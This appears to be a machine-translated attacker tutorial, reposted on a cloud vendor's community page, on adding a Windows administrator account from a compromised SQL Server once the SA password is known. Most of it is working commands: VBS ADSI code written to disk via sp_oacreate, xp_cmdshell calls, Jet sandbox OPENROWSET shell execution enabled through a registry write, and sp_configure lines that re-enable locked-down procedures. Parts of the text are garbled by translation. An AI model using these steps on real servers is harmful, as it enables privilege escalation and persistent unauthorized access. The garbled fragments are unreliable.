How to add an administrator without using net commands

Source: Internet
Author: User

 

After obtaining the SA password, the Server Manager or? Predecessors? Restrict the use of net.exeand net1.exe, and you cannot add an administrator account. We know that VBS has a winnt object in the Active Directory (ADSI) to manage local resources. You can add an administrator without using commands such as CMD. The specific code is as follows:
Set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")
OS = "WinNT: //" & wsnetwork. ComputerName
Set ob = GetObject (OS) Get adsi interface, bind
Set oe = GetObject (OS & "/Administrators, group") attribute, admin group
Set od = ob. Create ("user", "test") Create a user
Od. SetPassword "1234" Set Password
Od. SetInfo save
Set of = GetObject (OS & "/test", user) to get the user
Oe. add OS & "/test"
Save the above Code as 1.vbs, and then execute the command? Cscript 1.vbs ?, In this way, a user named test and password 1234 will be added to the system. The Code executed in the query analyzer is as follows:
Declare @ o int, @ f int, @ t int, @ ret int
Exec sp_oacreate scripting. filesystemobject, @ o out
Exec sp_oamethod @ o, createtextfile, @ f out, c: 1.vbs, 1
Exec @ ret = sp_oamethod @ f, writeline, NULL, set wsnetwork = CreateObject
("WSCRIPT. NETWORK ")
Exec @ ret = sp_oamethod @ f, writeline, NULL, OS = "WinNT: //" & wsnetwork.
ComputerName
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set ob = GetObject (OS)
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set oe = GetObject
(OS & "/Administrators, group ")
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set od = ob. Create
("User", "test ")
Exec @ ret = sp_oamethod @ f, writeline, NULL, od. SetPassword "1234"
Exec @ ret = sp_oamethod @ f, writeline, NULL, od. SetInfo
Exec @ ret = sp_oamethod @ f, writeline, NULL, Set of = GetObject
(OS & "/test", user)
Exec @ ret = sp_oamethod @ f, writeline, NULL, oe. add OS & "/test"
After the preceding statement is executed, execute the following line of code. This line of code must be executed independently. Do not run it with the preceding statement. Otherwise, a prompt is displayed? C: 1. Is the vbs being run by another program? The user cannot be added successfully:
Exec master .. xp_mongoshell cscript c: 1.vbs
If the system user is not added successfully, it may be because the System user's password 1234 is too simple and does not comply with the complex password policy of the server. You can consider the complexity of the settings and then test it. You can also use echo to write the code to 1. vbs. The code format is:
Exec master .. xp_mongoshell echo set wsnetwork = CreateObject ("WSCRIPT. NETWORK ")
> 1.vbs
But I don't know why? &? The command line of the character cannot be written into 1.vbs. if you are interested, try to solve it.

The jet sandbox mode solves the troubles caused by stored procedures such as xp_mongoshell and related dynamic link libraries. For security reasons, the sandbox mode is disabled by default. Therefore, xp_regwrite is required to enable the sandbox mode:
Exec master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0
Engines, SandBoxMode, REG_DWORD, 1
Then run the sandbox command to add a user with the username test and password 1234 to the system:
Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net usertest 1234/add "))

Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windows
System32iasias. mdb, select shell ("cmd.exe/c net localgroup
Administrators test/add "))
Different operating systems have different paths and must be modified as needed:
NT/2 K: c: winntsystem32
XP/2003: c: windowssystem32
In addition, Microsoft SQL Server2005 disables some stored procedures by default. You need to run the following command:

Enable XP_cmdshell:
EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure
Xp_cmdshell, 1; RECONFIGURE;
Enable OPENROWSET:
Exec sp_configure show advanced options, 1; RECONFIGURE; exec sp_configure
Ad Hoc Distributed Queries, 1; RECONFIGURE;
Enable sp_oacreate:
Exec sp_configure show advanced options, 1; RECONFIGURE; exec sp_configure
Ole Automation Procedures, 1; RECONFIGURE
Bytes --------------------------------------------------------------------------------------------------------------


Belt? &? The command line of the character cannot be written to 1.vbsbecause the batch processing by the author is too spam, and this is unknown. Because & is a reserved word in bat, it cannot be ignored. If you want to use echo to write "&", you need to write echo ^ & xxxx in this way.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.